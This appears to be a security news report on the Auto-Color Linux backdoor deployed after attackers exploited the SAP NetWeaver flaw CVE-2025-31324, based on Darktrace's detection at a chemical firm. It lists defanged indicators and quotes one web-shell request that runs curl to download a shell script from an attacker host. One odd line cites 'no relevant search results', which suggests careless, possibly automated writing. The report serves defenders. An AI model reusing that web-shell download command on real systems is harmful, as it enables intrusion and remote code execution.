Malicious actors insert "Auto-Color" malware into systems following SAP intrusions, with Darktrace intercepting an assault on a chemical corporation.
In a recent cybersecurity incident, a Linux malware known as the Auto-Color backdoor has been detected infiltrating systems through a critical security vulnerability in SAP NetWeaver, identified as CVE-2025-31324.
On April 25, 2025, Darktrace reported unusual activity, potentially indicative of probing related to the CVE-2025-31324 vulnerability. The incident unfolded when an incoming connection was made from IP address 91.193.19[.]109[.], accompanied by a download of a ZIP file, marking the initial exploitation.
The Auto-Color backdoor malware is particularly tenacious and difficult to detect, as each instance uses a unique file and a unique hash, and embeds its commands and control data at creation time. It attacks Linux systems by exploiting integrated system functions like ld.so.preload.
Once the malware is executed, it downloads a script via the file helper.jsp, which had been downloaded during the first exploit. The device continued to receive incoming connections with URIs containing "/developmentserver/metadatauploader", with a total of seven files downloaded.
One of these downloads was a shell script named config.sh, which was received from 23.186.200[.]173 with the URI "/irj/helper.jsp?cmd=curl -O hxxps://ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh".
The Auto-Color backdoor malware is known to have functions such as remote code execution, reverse shell, proxy relaying, file changes, and dynamic configuration updates. If the C2 server is unreachable, Auto-Color effectively stops and refrains from using its entire malicious functionality, appearing harmless to analysts.
In addition, the malware uses an integrated rootkit to conceal its activities from security solutions. About 10 hours later, the device made a DNS query to "ocr-freespace.oss-cn-beijing.aliyuncs[.]com", and later, it made several connections to 47.97.42[.]177 via port 3232, an endpoint associated with Supershell, a C2 platform linked to backdoors and frequently used by threat groups associated with China.
Less than 12 hours later and just 24 hours after the first exploit, the attacker downloaded an ELF file from the device, marking the delivery of the Auto-Color malware.
Following the discovery of this malware, security firms such as ReliaQuest, Onapsis, and watchTowr reported increased attack attempts, and ransomware groups and Chinese APTs joined in. Mandiant discovered signs of a zero-day exploit as early as March.
It's worth noting that SAP patched the security vulnerability in April 2025. However, the origins and background of the Auto-Color Backdoor malware remain unclear, as there are no relevant search results providing information about its background and origin.
This incident serves as a reminder for organisations to keep their systems updated and to be vigilant against such cyber threats. Regular security audits and the implementation of robust security measures can go a long way in protecting against such attacks.
